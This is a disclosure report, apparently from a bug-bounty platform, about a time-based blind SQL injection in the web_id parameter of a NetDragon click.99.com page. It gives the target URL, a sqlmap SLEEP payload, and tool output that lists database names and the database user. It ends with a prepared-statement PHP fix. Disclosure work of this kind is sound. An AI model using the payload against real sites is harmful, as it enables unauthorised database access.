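2015-10-09: Details reported to the vendor; awaiting vendor handling
2015-10-10: Vendor confirmed; details disclosed to the vendor only
2015-10-20: Details disclosed to core white hats and experts in related fields
2015-10-30: Details disclosed to regular white hats
2015-11-09: Details disclosed to intern white hats
2015-11-24: Details disclosed to the public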
Blind SQL injection vulnerability on a NetDragon (网龙) site
Injection URL:
http://click.99.com/static.php?channel=20016&web_id=2303663&kind=1
Injected parameter:
web_id
Running it through sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: web_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: channel=20016&web_id=2303663 AND (SELECT * FROM (SELECT(SLEEP(5)))GyUZ)&kind=1
---
[14:14:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL 5.0.12
[14:14:05] [INFO] fetching database names
[14:14:05] [INFO] fetching number of databases
[14:14:05] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[14:14:05] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[14:14:07] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 2
[14:14:21] [INFO] retrieved:
[14:14:27] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[14:15:45] [INFO] retrieved: click91
available databases [2]:
[*] click91
[*] information_schema

[14:17:01] [INFO] retrieved:
[14:17:11] [INFO] adjusting time delay to 2 seconds due to good response times
'click91'@'192.168.33.0/255.255.255.0'
database management system users [1]:
[*] 'click91'@'192.168.33.0/255.255.255.0'
Filter and escape!
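
One way to apply that fix to the three numeric GET parameters of static.php, as an added example that is not part of the original report and not the vendor's code: each value is validated as an integer and then bound to a prepared statement. The `sites` table, its columns and the function names are hypothetical, and in-memory SQLite stands in for the MySQL back end so the script runs offline.

```php
<?php
// Added example, not the vendor's code. The `sites` table and its columns are
// hypothetical; in-memory SQLite stands in for MySQL so this runs offline.

// Return the named parameter as an integer >= 1, or fail closed.
function int_param(array $query, $name)
{
    $raw = isset($query[$name]) ? $query[$name] : null;
    $int = filter_var($raw, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($int === false) {
        throw new InvalidArgumentException("rejected parameter: $name");
    }
    return $int;
}

// Look up a site row using only bound, typed values; no string concatenation.
function find_site(PDO $db, array $query)
{
    $stmt = $db->prepare(
        'SELECT web_id FROM sites WHERE web_id = :web_id AND channel = :channel AND kind = :kind'
    );
    foreach (array('web_id', 'channel', 'kind') as $name) {
        $stmt->bindValue(':' . $name, int_param($query, $name), PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchColumn();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false.
$db->exec('CREATE TABLE sites (web_id INTEGER PRIMARY KEY, channel INTEGER, kind INTEGER)');
$db->exec('INSERT INTO sites VALUES (2303663, 20016, 1)');

// Query strings taken from the report: the normal request and the sqlmap payload.
$samples = array(
    'channel=20016&web_id=2303663&kind=1',
    'channel=20016&web_id=2303663 AND (SELECT * FROM (SELECT(SLEEP(5)))GyUZ)&kind=1',
);
foreach ($samples as $qs) {
    parse_str($qs, $query);
    try {
        echo 'found web_id ', find_site($db, $query), "\n";
    } catch (InvalidArgumentException $e) {
        echo $e->getMessage(), "\n";   // 400-style rejection; the query never runs
    }
}
```

The second sample fails integer validation on `web_id`, so the request is rejected before any SQL is executed.
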
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-10-10 09:15
Thanks to 星明月稀
None yet